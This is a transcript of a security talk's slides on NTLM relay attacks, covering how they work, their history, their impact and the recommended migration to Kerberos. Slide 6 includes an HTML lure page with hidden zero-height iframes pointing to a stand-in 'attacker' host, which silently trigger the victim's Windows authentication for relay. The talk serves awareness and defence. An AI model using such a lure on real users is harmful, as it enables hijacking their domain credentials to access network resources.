1 / 12

NTLM Relay Attacks

NTLM Relay Attacks. Eric Rachner eric@rachner.us http://www.rachner.us. The Relay Attack Scenario. Assumptions Windows-based enterprise, NTLM auth not disabled Attacker’s machine has a “local intranet” host name (e.g., http://laptop or http://laptop209.acme.com ) Exploitability & Impact

angie
Download Presentation

NTLM Relay Attacks

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. NTLM Relay Attacks Eric Rachner eric@rachner.us http://www.rachner.us

  2. The Relay Attack Scenario • Assumptions • Windows-based enterprise, NTLM auth not disabled • Attacker’s machine has a “local intranet” host name (e.g., http://laptop or http://laptop209.acme.com) • Exploitability & Impact • Victim only needs to visit attacker’s web site • Attacker can then access arbitrary network resources using the victim’s domain account

  3. About NTLM • Part of Windows Integrated Auth protocol suite • Enabled by default • Essentially a challenge-response design • Server transmits challenge / nonce • Client computes, sends response

  4. The Basic Problem:Lack of mutual authentication A client thinks it’s authenticating tohttp://hacker, but it’s actually authenticating to http://targetapp – by way of the hacker’s machine!

  5. History & Due Credit • 2001: First implemented by Sir Dystic of cDcas SMBRelay • 2004: Jesse Burns of iSec demonstrates updated SMB-based attack at Black Hat(…but doesn’t release the code.) • 2007: Metasploit team re-implements SMB attack, integrates it into development branch • 2008: HTTP-to-HTTP based attack implemented by yours truly

  6. How It Begins… <html> <!-- This is the diversion: --> <iframesrc="http://www.youtube.com/v/bGTZoyARvnQ&rel=1&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></iframe> <!-- And this is the nasty part: --> <iframe height=0 src="http://attacker:81/"></iframe> <iframe height=0 src="http://attacker:82/"></iframe> </html>

  7. Incidentally, • I urge you to consider this a rogue server problem, and not a man-in-the-middle scenario, insofar as the attacker does not need to: • Poison DNS • Spoof ARP packets • Re-route traffic • Operate a rogue access point • Exploit the WPAD problem • …or otherwise interpose themselves along the network path to the targeted server

  8. Demo

  9. In re. Fear, Uncertainty & Doubt: “Say, is there any reason this attack couldn’t be leveraged in any scenario where NTLM is supported?” Handy list of possible targets posted at http://www.microsoft.com/products/

  10. More Bad News • Internet-borne attacks are possible against internet-facing apps • Clients in coffeeshops: easy targets • Clients on intranets: tougher targets, but possibly vulnerable in tricky DNS rebinding scenarios

  11. Analysis • No, SSL is not helpful here. • NTLMv2 just as vulnerable as NTLMv1 • NTLM has numerous other problems(ref. Jesse Burns 2004; Moniz & Stach, 2005; Grutz, et. al. 2007) • 0-day? More like 2,555-day • Long story short: migrate away from NTLM, ideally towards Kerberos

  12. Questions? Eric Rachner eric@rachner.us http://www.rachner.us

More Related